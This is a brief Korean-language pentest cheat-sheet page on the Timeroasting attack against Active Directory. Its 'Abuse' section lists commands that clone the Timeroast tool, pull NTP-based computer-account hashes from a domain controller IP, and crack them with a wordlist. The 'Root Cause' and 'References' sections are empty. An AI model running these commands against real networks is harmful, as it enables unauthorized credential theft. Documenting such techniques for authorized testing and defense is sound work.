Timeroasting
Abuse
# Timeroast 설치
git clone https://github.com/SecuraBV/Timeroast.git
cd Timeroast
# 타임 해시 획득
python3 timeroast.py 192.168.1.11 | tee timehashs.txt
# 해시 크랙
python3 ./extra-scripts/timecrack.py timehashs.txt wordlistsRoot Cause









References
Last updated